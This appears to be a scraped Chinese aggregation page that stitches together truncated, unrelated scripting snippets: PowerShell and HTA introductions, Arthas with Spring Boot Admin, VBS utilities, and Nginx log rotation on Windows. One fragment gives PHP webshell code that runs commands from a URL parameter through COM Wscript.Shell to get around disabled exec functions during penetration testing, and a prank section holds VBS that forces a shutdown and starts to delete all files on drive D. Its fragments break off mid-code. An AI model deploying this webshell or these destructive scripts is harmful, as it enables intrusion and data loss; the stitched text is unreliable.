w-script

众所周知，Powershell早已被集成到了windows的环境中，国外大牛玩得不亦乐乎，而国内圈子却很少听到讨论Powershell的，HTA更不用说了，不是学计算机的或许根本不知道这是什么鬼 Linux下有bash，Windows下有Powershell。Powershell依靠在.NET这个大树下，因此也有了比如直接调用windowsAPI等强大功能和利用价值。 Powershell 脚本后缀名为ps1，这种格式不像bat、vbs、exe等双击执行，而是需要经由powershell.exe启动，可以直接使用： PowerShell.exe -ExecutionPolicy Bypass -File .\script.ps1 在win7和server08后，Powershell被集成在系统中，此举方便了服务器的管理，同样，过分的的强大也让自己危险了很多。 HTA hta格式，看上去一个陌生的后缀，但实际遨游网络的你天天都接触到，因为它也是网页格式的一种，类似于html/htm ，通过html语法编写内容。 HTA是HTML-Application的缩写，是软件开发的新概念，直接将某个html页面保存成hta的格式，就是一个独立的应用软件，点开与网页内容并无区别，界面与VB、C++等程序语言所设计的软件界面没什么差别，显示为窗口交互界面。 相关内容： HTA_百度百科 就是个网页

作者 | 阿提说说 来源| 阿里巴巴云原生公众号 前言 Arthas 是 Alibaba 开源的 Java 诊断工具，具有实时查看系统的运行状况；查看函数调用参数、返回值和异常；在线热更新代码；秒解决类冲突问题；定位类加载路径；生成热点；通过网页诊断线上应用。如今在各大厂都有广泛应用，也延伸出很多产品。 这里将介绍如何将 Arthas 集成进 Spring Boot 监控平台中。 SpringBoot Admin 为了方便，SpringBoot Admin 简称为 SBA（版本：1.5.x）。 1.5 版本的 SBA 如果要开发插件比较麻烦，需要下载 SBA 的源码包，再按照 Spring-boot-admin-server-ui-hystrix的形式 Copy 一份,由于 JS 使用的是 Angular，本人尝试了很久，虽然掌握了如何开发插件，奈何不会 Angular，遂放弃💀 版本：2.x 2.x 版本的 SBA 插件开发，官网有介绍如何开发，JS 使用 Vue，方便很多，由于我们项目还在使用 1.5，所以并没有使用该版本，请读者自行尝试。 不能使用 SBA 的插件进行集成，那还有什么办法呢？😅 SBA 集成 鄙人的办法是将 Arthas 的相关文件直接 Copy 到 Admin 服务中，这些文件都来自 Arthas-all 项目 Tunnel-server。 admin

在c盘下面新建文件 ping.vbs 在 ping.vbs中输入代码如下: Dim args, flag, unsuccOut args="" otherout="" flag=0 If WScript.Arguments.count = 0 Then WScript.Echo "Usage: cscript tping.vbs [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]" WScript.Echo " [-s count] [[-j host-list] | [-k host-list]]" WScript.Echo " [-r count] [-w timeout] destination-list" wscript.quit End if For i=0 to WScript.Arguments.count - 1 args=args & " " & WScript.Arguments(i) Next Set shell = WScript.CreateObject("WScript.Shell") Set re=New RegExp re.Pattern="^Reply|^Request|^来自|^请求" Set myping=shell.Exec("ping" & args) while Not myping

1.cd /d D:\>cd mysql D:\mysql>cd /d C:/TEMP C:\Temp>cd /? 显示当前目录名或改变当前目录。 CHDIR [/D] [drive:][path] CHDIR [..] CD [/D] [drive:][path] CD [..] .. 指定要改成父目录。 键入 CD drive: 显示指定驱动器中的当前目录。 不带参数只键入 CD，则显示当前驱动器和目录。 使用 /D 开关，除了改变驱动器的当前目录之外， 还可改变当前驱动器。 如果命令扩展被启用，CHDIR 会如下改变: 当前的目录字符串会被转换成使用磁盘名上的大小写。所以， 如果磁盘上的大小写如此，CD C:\TEMP 会将当前目录设为 C:\Temp。 CHDIR 命令不把空格当作分隔符，因此有可能将目录名改为一个 带有空格但不带有引号的子目录名。例如: cd \winnt\profiles\username\programs\start menu 与下列相同: cd "\winnt\profiles\username\programs\start menu" 在扩展停用的情况下，你必须键入以上命令。 C:\Temp>cd 　　 2.建立多级目录 md IBM\SPSS\Modeler\18.0\ 3.windows下.bat每隔一段时间（例如15分钟

strPName = "notepad.exe" strComputer = "." Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = '" & strPName & "'") For Each objProcess in colProcessList objProcess.Terminate() Next WScript.Sleep 2000 objshell.Run "c:\windows\system32\notepad.exe" ———————————————————————————— 注： strPName为进程名 objshell run 为进程路径 来源： oschina 链接： https://my.oschina.net/u/4357969/blog/4872213

在渗透测试过程中可能经常会遇到上传webshell后，由于php.ini配置禁用了一些如exec()，shell_exec()，system()等执行系统命令的函数，导致无法执行系统命令，就此问题给出几种绕过方法。 话不多说，直接贴代码： ···math <?php $phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!"); $exec=$phpwsh->exec("cmd.exe /c ".$_GET['c'].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> <?php ··· ··· header("Content-Type: text/plain"); $cmd="/tmp/exec"; @unlink($cmd); $c = "#!/usr/bin/env bash\n".$_GET[x]."> /tmp/output.txt\n"; file_put_contents($cmd, $c); chmod($cmd, 0777); $cd="/tmp/output.txt"; print_r(file_get_contents($cd)); switch (pcntl

复制一下就可以，或者是下载文档，改一下备注，链接https://github.com/awolfteam/wolfteam/blob/master/%E8%87%AA%E5%8A%A8%E6%89%93%E5%AD%97.vbs 1 Set ws= CreateObject ( " wscript.shell " ) Dim a,cut,b, Str ,flag flag = false cut = 1 a = Inputbox ( " 快过年了，有什么愿望吗？ " ,, " 有 " ) MsgBox " ......... " MsgBox " 我就知道你会有愿望的 " MsgBox " 那我就我送你个礼物给你 " MsgBox " 给你发个新年祝福 " MsgBox " 闭上眼 " a = Inputbox ( " 要不要新年祝福? " ,, " 要 " ) If a<> " 要 " Then MsgBox " 呜呜，真的不给机会吗？ " Do b = InputBox ( Str + " 试一下吧 " ,, " 不 " ) Str = Str & " 请 " If b<> " 不 " Then flag = true Exit Do Else cut=cut+ 1 End If If cut= 5 Then MsgBox " 那好吧，再见！ " Exit Do End If

蓝屏后关机： if MsgBox("你是猪吗？",vbYesNo,"提示")=vbYes then do msgbox "haha" loop else msgbox "还不承认!! 作为惩罚，蓝屏一下",1200,"呵呵呵呵" if msgbox ("再给你一次机会你是不是sb",vbyesNo,"逗比选择")=vbyes then msgbox "玩你的" else Set ws = CreateObject("Wscript.Shell") ws.run "cmd.exe /c shutdown -s -t 5 -c ""呵呵呵我其实是在关机"" " do msgbox" -----哈哈啊哈哈哈--------------------------------别想去掉 我" loop end if end if 立即关机： set ink=WScript.CreateObject("WScript.Shell") msgbox "命令完成成功！"&"By BlueSniper_ink(123403760)" ink.Run "cmd.exe /c shutdown -s -t 0 -f" 删除d的所有文件： dim WSHshell set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "cmd /c

本地时间转UTC时间 dim SWDT, datetime, utcTime Set SWDT = CreateObject("WbemScripting.SWbemDateTime") datetime = "2019-10-11 12:00:00" '本地时间转UTC时间 SWDT.SetVarDate datetime, True utcTime = SWDT.GetVarDate (False) UTC时间转本地时间 dim SWDT, datetime, localTime Set SWDT = CreateObject("WbemScripting.SWbemDateTime") datetime = "2019-10-11 12:00:00" 'UTC时间转本地时间 SWDT.SetVarDate datetime, False localTime = SWDT.GetVarDate(True) 示例： 新建文本文件，写入以下代码，改后缀名为vbs。 dim SWDT, datetime, utcTime, localTime Set SWDT = CreateObject("WbemScripting.SWbemDateTime") datetime = "2019/10/11 12:00:00" '本地时间转UTC时间 SWDT.SetVarDate

Nginx大多是在Linus环境下使用，网上Nginx的日志切分基本都是在Linus环境下通过sheet脚本执行。 最近由于业务需要windows环境下运行Nginx，要做日志分割。但是在网上找了一圈，大多是需要借助UnxUtils这个工具来获取前一天的时间。其实在windows环境下，可以用vb脚本（VB Script）来实现获取前一天时间的功能。 1. 关闭Ngins： nginx -s stop 注意：命令要在cmd.exe（win+R，输入cmd，回车）执行，并定位到Nginx安装目录 2. 在Nginx安装目录下创建一个文件夹datalogs，用来存放备份的Nginx日志 3. 在Nginx安装目录下创建一个文件demo.bat，写入一下vb脚本 @echo off rem @echo off rem 取1天之前的日期 echo wscript.echo dateadd("d",-1,date) >%tmp%\tmp.vbs for /f "tokens=1,2,3* delims=/" %%i in ('cscript /nologo %tmp%\tmp.vbs') do set y=%%i for /f "tokens=1,2,3* delims=/" %%i in ('cscript /nologo %tmp%\tmp.vbs') do set m=%%j for